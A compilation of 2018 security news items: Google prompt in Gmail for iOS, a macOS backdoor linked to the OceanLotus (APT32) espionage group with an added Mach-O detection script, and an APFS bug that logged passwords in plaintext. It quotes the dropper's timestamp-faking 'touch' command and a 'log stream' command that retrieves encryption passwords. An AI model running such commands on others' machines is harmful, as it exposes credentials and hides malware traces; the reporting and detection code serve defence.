In July last year, after adding real-time security information about the login attempt, such as when and where it was made, Google started inviting 2SV SMS users to Google prompt.

In October last year, the company made Google prompt the primary choice for G Suite users turning on 2SV for the first time. The company pushed the feature to all of its users who chose to enable the extra layer of security, but continued to require the Google app to be installed for iOS users to benefit from the added security.

In an attempt to entice more users to start using Google prompt, the search company has now decided to eliminate this requirement.

“Today, we’re making it possible for users with iOS devices to receive prompts via their Gmail app as well. This should encourage more people to use Google prompt, which is an easier and more secure method of authenticating an account,” Google notes in a blog post.

According to Google, users who have both the Google app and Gmail app installed on their iOS devices will see the prompts from Gmail.

The availability of Google prompt in Gmail for iOS is rolling out for all G Suite editions and should become available to all users in a matter of days (though it could take up to 2 weeks to become visible for some of them).

New macOS Backdoor Linked to Cyber-espionage Group
6.4.2018 securityweek CyberSpy  Apple

A recently discovered macOS backdoor is believed to be a new version of malware previously associated with the OceanLotus cyber-espionage group, Trend Micro says.

Also known as APT 32, APT-C-00, SeaLotus, and Cobalt Kitty, OceanLotus is believed to be operating out of Vietnam and has been targeting high-profile corporate and government organizations in Southeast Asia. Well-resourced and determined, the group uses custom-built malware and already established techniques.

Some of the group’s targets include human rights organizations, media organizations, research institutes, and maritime construction firms.

The newly discovered macOS backdoor, which Trend Micro detects as OSX_OCEANLOTUS.D, has been observed on machines that have the Perl programming language installed.

The malware is being distributed via malicious documents attached to emails. The document masquerades as the registration form for an event with HDMC, an organization in Vietnam that advertises national independence and democracy.

The document contains malicious, obfuscated macros with a payload written in Perl. The macro extracts an XML file from the Word document. This file is an executable acting as the dropper for the final payload, which is the backdoor.

The dropper, which has all of its strings encrypted using a hardcoded RSA256 key, is also used to establish the backdoor’s persistence on the infected system. It checks whether it is running as root or not and uses a different installation path and filename accordingly.

The dropper sets the backdoor’s attributes to “hidden” and uses random values for the file date and time, and deletes itself at the end of the process.

The backdoor has two main functions, which collect platform information and send it to the command and control (C&C) server. It can also receive additional C&C communication information, which is encrypted before being sent.

“Malicious attacks targeting Mac devices are not as common as its counterparts, but the discovery of this new macOS backdoor that is presumably distributed via phishing email calls for every user to adopt best practices for phishing attacks regardless of operating system,” Trend Micro concludes.

OSX_OCEANLOTUS.D, a new macOS backdoor linked to APT 32 group
6.4.2018 securityaffairs APT  Apple

Security experts at Trend Micro have discovered a new macOS backdoor that they linked to the APT 32 (OceanLotus, APT-C-00, SeaLotus, and Cobalt Kitty) cyber espionage group.
The APT32 group has been active since at least 2013; according to the experts, it is a state-sponsored hacking group. The hackers hit organizations across multiple industries and have also targeted foreign governments, dissidents, and journalists.

Since at least 2014, experts at FireEye have observed APT32 targeting foreign corporations with an interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. The APT32 is also targeting peripheral network security and technology infrastructure corporations, and security firms that may have connections with foreign investors.

The APT32 group uses custom-built malware for its attacks; the newly discovered macOS backdoor is tracked by experts at Trend Micro as OSX_OCEANLOTUS.D.

The researchers found the backdoor on macOS systems that have the Perl programming language installed.

“We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. APT 32, APT-C-00, SeaLotus, and Cobalt Kitty).” reads the analysis published by Trend Micro.

“The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed.”

The hackers use spear-phishing messages as the attack vector; the backdoor is distributed via weaponized documents attached to emails. The bait document masquerades as the registration form for an event with HDMC, an organization in Vietnam that advertises national independence and democracy.


The malicious document contains obfuscated macros with a Perl payload. The macro extracts an XML file (theme0.xml) from the document; this file is actually a Mach-O 32-bit executable with a 0xFEEDFACE signature that acts as the dropper for the final OSX_OCEANLOTUS.D backdoor.
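
The indicator above, a document part with an XML name whose contents begin with a Mach-O magic, is something a mail gateway or an analyst can check for without running any macro, because an Office document is a zip container. The following is an added example for this page, not Trend Micro’s code: it walks every member of the container and flags any whose first four bytes are a Mach-O or fat-binary magic in either byte order. The document it scans is constructed in memory (a minimal docx-like zip with a fake theme0.xml part), and `suspicious_parts` can be pointed at real file bytes the same way.

```python
"""Flag Office-document zip members that are really Mach-O executables
(added example, not Trend Micro's code). Sample document is constructed."""
import io
import struct
import zipfile

# First four bytes of a Mach-O file in both byte orders:
# 0xFEEDFACE = 32-bit (the signature reported for theme0.xml),
# 0xFEEDFACF = 64-bit, 0xCAFEBABE = fat/universal binary.
MACHO_MAGICS = {
    bytes.fromhex("feedface"), bytes.fromhex("cefaedfe"),
    bytes.fromhex("feedfacf"), bytes.fromhex("cffaedfe"),
    bytes.fromhex("cafebabe"), bytes.fromhex("bebafeca"),
}


def is_macho(data):
    """True if the data starts with a Mach-O or fat-binary magic."""
    return len(data) >= 4 and bytes(data[:4]) in MACHO_MAGICS


def suspicious_parts(doc_bytes):
    """Names of zip members whose first four bytes are a Mach-O magic,
    regardless of the extension the member name claims (e.g. .xml)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for info in zf.infolist():
            with zf.open(info) as member:
                head = member.read(4)
            if is_macho(head):
                hits.append(info.filename)
    return hits


def build_sample_doc(with_macho=True):
    """Constructed minimal docx-like container; when with_macho is set the
    theme0.xml part starts with the 0xFEEDFACE header instead of XML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macho:
            # big-endian magic followed by a zeroed stand-in for the header
            theme = struct.pack(">I", 0xFEEDFACE) + b"\0" * 24
        else:
            theme = b"<a:theme/>"
        zf.writestr("word/theme/theme0.xml", theme)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print("macho part present:", flag, "->", suspicious_parts(build_sample_doc(flag)))
```

A member that passes this check should be treated as an executable for the rest of the pipeline (hashing, sandbox detonation, blocking), whatever its name says it is.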

“All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key. There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string.” continues the report.

“Using the setStartup() method, the dropper first checks if it is running as a root or not. Based on that, the GET_PROCESSPATH and GET_PROCESSNAME methods will decrypt the hardcoded path and filename where the backdoor should be installed.”

Once the dropper has installed the backdoor, it sets the file’s attributes to “hidden” and sets its date and time to random values using the touch command:

touch -t YYMMDDMM “/path/filename” > /dev/null

It also changes the permissions to 0x1ed = 755, which is equal to u=rwx,go=rx.

The backdoor loops over two main functions, infoClient and runHandle: infoClient collects platform information and sends it to the command and control (C&C) server, while runHandle implements the backdoor capabilities.

The discovery of a new backdoor linked to the APT32 group confirms that the state-sponsored crew has been very active in recent months.

Apple macOS Bug Reveals Passwords for APFS Encrypted Volumes in Plaintext
1.4.2018 thehackernews Apple

A severe programming bug has been found in the APFS file system for macOS High Sierra that exposes the passwords of encrypted external drives in plain text.
Introduced two years ago, APFS (Apple File System) is a file system optimized for flash and SSD-based storage on macOS, iOS, tvOS and watchOS, and promises strong encryption and better performance.
Discovered by forensic analyst Sarah Edwards, the bug leaves the encryption password for a newly created APFS volume (e.g., when encrypting a USB drive using Disk Utility) in the unified logs in plaintext, and does the same when encrypting previously created but unencrypted volumes.
"Why is this a big deal? Well, passwords stored in plaintext can be discovered by anyone with unauthorized access to your machine, and malware can collect log files as well and send them off to someone with malicious intent," Edwards said.

The password for an encrypted APFS volume can be retrieved simply by running the following 'log stream' command in the terminal, which shows the unified log entries written by the 'newfs_apfs' utility:
log stream --info --predicate 'eventMessage contains "newfs_"'
However, this bug is not as stupid as the previously disclosed root password bug wherein the password hint section was exposing the actual password in the plain text.
Though the exact reason of the programming error is not clear, the researcher believes "it was likely a result of other APFS encryption related bugs (or at least somehow related to it), so perhaps Apple felt it didn't need to provide the additional details."
It should be noted that you would not find the password in the plaintext when converting a non-APFS drive to APFS and then encrypting the drive.
Edwards tested and found that the bug affects only macOS 10.13 and 10.13.1, while later versions of macOS High Sierra (including the latest one) have reportedly fixed this loophole.
For more technical details of this bug, you can head on to the original blog post by Edwards.
This issue is the third APFS bug in the past six months affecting Apple's latest macOS High Sierra version.
The operating system has seen a number of security issues since its release—from giving away root access to anyone without a password to revealing passwords in plaintext from the password hint feature.